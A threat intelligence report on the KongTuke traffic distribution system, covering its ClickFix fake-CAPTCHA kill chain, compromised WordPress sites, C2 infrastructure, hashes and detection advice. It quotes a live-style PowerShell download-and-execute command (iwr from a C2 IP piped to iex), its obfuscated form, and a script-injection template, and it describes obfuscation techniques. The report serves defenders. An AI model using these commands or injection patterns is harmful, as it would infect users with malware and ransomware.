BreakglassIntelligence
Back to reports
highPhishing

KongTuke Investigation Report

PublishedMarch 12, 2026
Threat Actors:SocGholishAssessment
phishingasyncratsocgholishsocial-engineeringc2botnetransomwareapt

GHOST / Breakglass OSINT

Date: 2026-03-09 Classification: TLP:CLEAR Status: Complete - Initial Investigation

Executive Summary

KongTuke (aka TAG-124, LandUpdate808, Chaya_002, 404 TDS) is an active Traffic Distribution System (TDS) operating as an Initial Access Broker (IAB) service. It leverages compromised WordPress websites to deliver malware through fake CAPTCHA/ClickFix social engineering lures, ultimately serving ransomware operators including Rhysida, Interlock, 8Base, Akira, and AlphV/BlackCat.

This investigation analyzed 10 MalwareBazaar samples, 100 ThreatFox IOCs, and mapped infrastructure across 39 TDS domains, 25+ C2 IPs, and multiple bulletproof hosting providers. The operation is actively running as of March 9, 2026, with domains registered as recently as March 6, 2026.

What is KongTuke?

KongTuke is NOT a malware payload itself -- it is a Traffic Distribution System that functions as a service:

  1. Compromised WordPress sites are injected with a script tag loading external JS
  2. The JS (served from actor-controlled domains via /js.php or /random.js) evaluates the visitor
  3. Qualifying visitors see a fake CAPTCHA (ClickFix) that copies a PowerShell command to clipboard
  4. The victim pastes and runs the command, which downloads and executes a second-stage payload
  5. The second stage varies by customer -- KongTuke sells infections to multiple ransomware/RAT operators

Business Model

KongTuke operates as an Initial Access as a Service platform, selling infections to:

  • Ransomware affiliates (Rhysida, Interlock, 8Base, Akira, AlphV)
  • RAT operators (Remcos, AsyncRAT, Interlock RAT)
  • Other IABs (SocGholish)
  • Loader operators (MintsLoader, Emmenhtal, D3F@CK Loader)
  • APT groups (TA866/Asylum Ambuscade, TA582)

Kill Chain (from sample analysis)

Stage 1: JavaScript Injection

Compromised WordPress sites contain injected script tags:

<script src="https://<tds-domain>/<random>.js"></script>

The TDS domain also serves js.php which acts as a dynamic payload gate.

Stage 2: ClickFix Social Engineering

Victim sees a fake CAPTCHA dialog that copies a PowerShell command to clipboard. The command uses ROT cipher or XOR obfuscation:

Simple variant (Feb 10, 2026):

powershell.exe -ep bypass -c iex (-join [char[]]@(10,105,119,114,...))

Decodes to: iwr http://142.93.242.144:3456/o -useb | iex

Obfuscated variant (Feb 5, 2026): Uses ROT-N cipher on URL (e.g., tffb:// with ROT-14 = http://) with variable shifts per sample.

XOR variant (Jan 28, 2026): Uses byte-level XOR with numeric keys to decode the URL.

Stage 3: Second-Stage Download

All samples download from http://<C2_IP>:3456/<single_letter> (port 3456 is consistent across the fleet). The payload is saved to %APPDATA%\script.ps1, executed, then self-deleted.

Stage 4: Payload Execution

The 7MB sample (e190ad0b) is an Emmenhtal loader -- heavily obfuscated PowerShell using:

  • 56,000+ lines of mathematical junk operations (control flow obfuscation)
  • A 284KB base64-encoded byte array containing the actual payload
  • .NET reflection-based execution via [Type] casting
  • Dynamic method resolution to evade static analysis
  • ClamAV detection: Win.Downloader.Emmenhtal-10044033-0

Stage 5: Final Payload

Based on public reporting, final payloads include:

  • Python-based backdoor (25.5MB package) with scheduled task persistence
  • Figma-impersonating installer (205MB) with RAT capabilities
  • Interlock RAT variant
  • Remcos RAT
  • MintsLoader -> Broomstick/WarmCookie

Infrastructure Map

TDS Domains (JavaScript injection layer) - 39 domains

Active as of March 2026:

DomainIPFirst SeenRegistrar
ewar4pres.com178.130.47.124Mar 6, 2026Unknown
oriana84.com178.130.47.124Mar 5, 2026NameSilo
cam4fr.com178.130.47.124Mar 4, 2026NameSilo
road-to-hell.topCloudflareMar 6, 2026PDR Ltd
heavens-gate.topCloudflareMar 3, 2026PDR Ltd
joseph-stalin.topCloudflareFeb 28, 2026PDR Ltd
achandograca.com178.130.47.124RecentUnknown
medipeads.com178.130.47.124RecentUnknown

Historical (still resolving):

DomainIPHosting
aacobson.com147.135.84.14OVH US
husnikmeat.com147.135.84.14OVH US
metavrze.com147.135.84.14OVH US
vimsltd.com147.135.84.14OVH US
ctpsih.com45.61.136.197BL Networks/FranTech
mieyabi.com45.61.136.91BL Networks/FranTech
dsourceva.com64.52.80.204BL Networks
emierich.com64.52.80.216BL Networks
tefalle.com64.94.84.182BL Networks
ts4style.com64.94.85.232BL Networks
ulaicavr.com64.94.84.109BL Networks
netzhit.com64.95.13.241BL Networks
stgbran.com64.95.10.178BL Networks
benecian.com193.149.187.221Unknown (RIPE)
wuliaox.com193.149.189.139Unknown (RIPE)
ainttby.com216.245.184.187BL Networks
mahleinc.com216.245.184.96BL Networks
nicorica.com185.168.208.108Unknown
abqsales.com206.71.149.57Unknown
foodgefy.com162.33.178.171BL Networks
xpertlearninghub.com162.252.174.162Namecheap

Additional domains: morasota.top, ms-cleaner.com/org/site/top, auth-ms-service.com/online/top, payload.bruemald.top, app.frugesta.top

C2 Servers (payload delivery) - from sample filenames

IPPortHostingSamplesPeriod
142.93.242.1443456DigitalOcean2Feb 9-10, 2026
68.183.102.1753456DigitalOcean1Feb 5, 2026
85.137.253.753456Shinomiya Hosting (UA)1Feb 4, 2026
143.198.120.233--DigitalOceanlabel onlyFeb 4, 2026
193.149.176.2493456Unknown (RIPE)1Jan 28, 2026
144.31.169.13456RIPE1Feb 3, 2026
144.31.238.373456RIPE2Jan 30 - Feb 2, 2026
45.61.139.15380BL Networks/FranTech1Jan 27, 2026

Botnet C2 IPs (from ThreatFox)

IPPortPurpose
143.110.220.2080Botnet C2 (hostname: vpnshieldapp.com)
193.187.151.19980Botnet C2
37.27.0.7680Botnet C2 (Hetzner)
45.12.2.16780Botnet C2 (hostname: LabTestProject.com)

Additional C2s (from malware-traffic-analysis PCAP, Jan 8, 2026)

IPPortFunctionHosting
144.31.221.6080Initial payload deliveryRIPE
144.31.221.7180ZIP archive hostRIPE
45.61.136.22280C2 (bz1d0zvfi03yhn1.top)BL Networks
64.52.80.15380Secondary C2BL Networks
173.232.146.6225658TLSv1.0 encrypted C2Eonix/Servinga
103.27.157.1464444TCP backdoorqwins.co
64.190.113.20679Finger protocol C2BL Networks
199.217.98.21780Payload deliveryBL Networks
199.217.99.4280Payload deliveryBL Networks
65.38.120.10980Payload deliveryBL Networks

Infrastructure Clustering

Primary Hosting: BL Networks (Sheridan, WY)

  • ARIN Org: BL Networks (BNL-77)
  • Address: 30 N Gould St, Ste R, Sheridan, WY 82801
  • IP Ranges: 64.52.80.x, 64.94.84-85.x, 64.95.10-13.x, 64.190.113.x, 65.38.120.x, 162.33.177-178.x, 199.217.98-99.x, 216.245.184.x
  • Also via FranTech/PonyNet: 45.61.136-139.x
  • Assessment: BL Networks is the dominant hosting provider for KongTuke infrastructure. The 30 N Gould St address in Sheridan, WY is a well-known address used by shell companies and bulletproof hosting operations.

Secondary Hosting: Global Connectivity Solutions (Haverfordwest, UK)

  • IP: 178.130.47.x
  • Hosts: 4 currently active TDS domains (ewar4pres.com, cam4fr.com, achandograca.com, medipeads.com)
  • Server: Apache/2.4.52 (Ubuntu)

Tertiary Hosting: OVH US

  • IP: 147.135.84.14
  • Hosts: 4 TDS domains (aacobson.com, husnikmeat.com, metavrze.com, vimsltd.com)

Cloud Cover: DigitalOcean

  • IPs: 142.93.242.144, 68.183.102.175, 143.198.120.233, 143.110.220.20
  • Used for ephemeral C2 servers (port 3456)

Operational Security

  • .top domains registered via PDR Ltd (India) with WHOIS privacy
  • .com domains registered via NameSilo and Namecheap
  • Let's Encrypt + Sectigo certificates (automated, free/cheap)
  • C2 domains behind Cloudflare for DDoS protection and IP obfuscation
  • Domains registered 0-3 days before use, rotated frequently
  • Port 3456 used consistently for payload delivery (distinctive fingerprint)
  • ROT cipher and XOR obfuscation varied per sample (shift values change)

Obfuscation Techniques

PowerShell Obfuscation (Stage 2)

  1. Char array encoding: [char[]]@(73,110,118,111,...) -> ASCII codes
  2. ROT-N cipher on URLs: e.g., tffb:// with ROT-14 = http://, shift varies per sample
  3. XOR encoding: Byte arrays XORed with numeric keys
  4. Multi-key XOR: String keys used for filename obfuscation
  5. String-to-char rotation on .NET class names: ApplicationData encoded as EttpmgexmsrHexe (ROT-22)

PowerShell Obfuscation (Stage 4 - Emmenhtal Loader)

  1. 56,000+ lines of junk math operations (dead code)
  2. 284KB base64 byte array containing encrypted payload
  3. .NET reflection via [Type] casting to resolve classes dynamically
  4. Multi-layer encoding: Base64 -> XOR -> .NET Assembly -> Execute
  5. Long variable names (30+ chars) to impede manual analysis
  6. File size inflation: 7.5MB to evade sandbox timeouts

Attribution Assessment

Operator Identity

KongTuke/TAG-124 operates as a shared service (Malware-as-a-Service / Initial Access Broker). Key indicators:

  1. Infrastructure scale (300+ compromised WordPress sites, 40+ TDS domains) suggests an organized operation
  2. BL Networks hosting cluster (Sheridan, WY shell company) indicates awareness of bulletproof hosting
  3. Domain registration patterns: PDR Ltd (India), NameSilo, Namecheap -- cheap, privacy-enabled registrars
  4. Rapid domain rotation: New domains every 1-3 days, with certificates provisioned same day
  5. Multiple customer payloads: Different final-stage malware families indicate a TDS-for-hire model

Customer Base

  • Rhysida ransomware (confirmed by Recorded Future)
  • Interlock ransomware (confirmed by DFIR Report)
  • TA866/Asylum Ambuscade (confirmed by Recorded Future)
  • SocGholish (confirmed by Recorded Future)
  • 8Base, Akira, AlphV/BlackCat (assessed by community reporting)

Connection to Shinomiya Hosting

The C2 IP 85.137.253.75 resolves to de-14.hosted-by.shinomiya-hosting.com with RIPE registration to Mykyta Skorobohatko (Ukraine). This may indicate a Ukrainian connection in the operator or infrastructure chain.

Victims

Compromised WordPress Sites (injection targets)

Recorded Future identified 300+ compromised WordPress sites including:

  • www.ecowas.int - Economic Community of West African States
  • www.pcbc.gov.pl - Polish Centre for Testing and Certification
  • bianchilawgroup.com - US law firm (confirmed by Recorded Future)
  • Hundreds of smaller businesses and organizations globally

End Victims (infected users)

Users who interact with the fake CAPTCHA and execute the PowerShell command. Based on the kill chain:

  • Windows users visiting any of 300+ compromised websites
  • English-language targeting primarily
  • Final impact depends on the customer payload: ransomware, RAT, infostealer

IOC Summary

Hashes (MalwareBazaar samples)

SHA256TypeFirst Seen
e190ad0b45882fdd19e62883151803a32adb148e8eb7475f1b316a00d9ecc82fPS1 (7.5MB Emmenhtal)Mar 2, 2026
3143d90eae4bdce90b538652cefc1ba92a69856a77cbe33a6947120c6d0fe3caPS1 (219B)Feb 10, 2026
ca6a5f4df6d679ca7f465eaea20660f69e946c4d215b34b270891afac5833f08PS1 (4.9KB)Feb 9, 2026
f3b81538a4127a0ae33f144d591c4bde03c027c077ce6a5251be14dfe34dc0c4PS1 (4.9KB)Feb 5, 2026
8d52d6d62dfb318520ccc16a9a7fcce4ae83bc528c0ea030498d873a1e8fc7cdPS1 (4.9KB)Feb 4, 2026
478aed491279bc953ecee8cc7edc569d25c6bd386057f0bbf78486eae9c76275PS1 (4.9KB)Feb 3, 2026
2e7a78d5d6abde8be81283091ed5ad12458b99cc5d4d685b613981d4e76aa928PS1 (4.9KB)Feb 2, 2026
110c1528c63451a376d49ddf272e9922ffb38798e1fabf385d3f85164127130aPS1 (4.9KB)Jan 30, 2026
942129efbabdc7b66276823d9b195b2d05c08defbb6a0db7c145ebb339574927PS1 (4.9KB)Jan 28, 2026
167b65a36d6db71056be8ccfc8fc361bb9e2e073942ee85b9d8132db2f2849d4PS1 (4.9KB)Jan 27, 2026

Detection Signatures

  • ClamAV: Win.Downloader.Emmenhtal-10044033-0
  • URL pattern: http://<IP>:3456/<single_letter>
  • PowerShell pattern: powershell.exe -ep bypass -c iex (-join [char[]]@(
  • WordPress injection paths: /wp-admin/images/wfgth.php, /wp-includes/pomo/update.php
  • URL parameter artifact: "refferer" (misspelling of "referer")
  • TDS URL patterns: /<random4chars>.js, /js.php
  • File drop: %APPDATA%\script.ps1

Recommendations

  1. Block all identified IPs and domains at firewall/proxy level
  2. Monitor for PowerShell execution with -ep bypass and [char[]]@( patterns
  3. Audit WordPress instances for injected script tags pointing to unknown domains
  4. Block BL Networks IP ranges (64.52.80.0/24, 64.94.84.0/23, 64.95.10.0/23, etc.) if not needed
  5. Monitor for port 3456 outbound connections as a distinctive KongTuke fingerprint
  6. Deploy YARA rules for Emmenhtal loader patterns (large PS1 files with byte arrays and .NET reflection)

References

GHOST / Breakglass OSINT - Investigation completed 2026-03-09

Share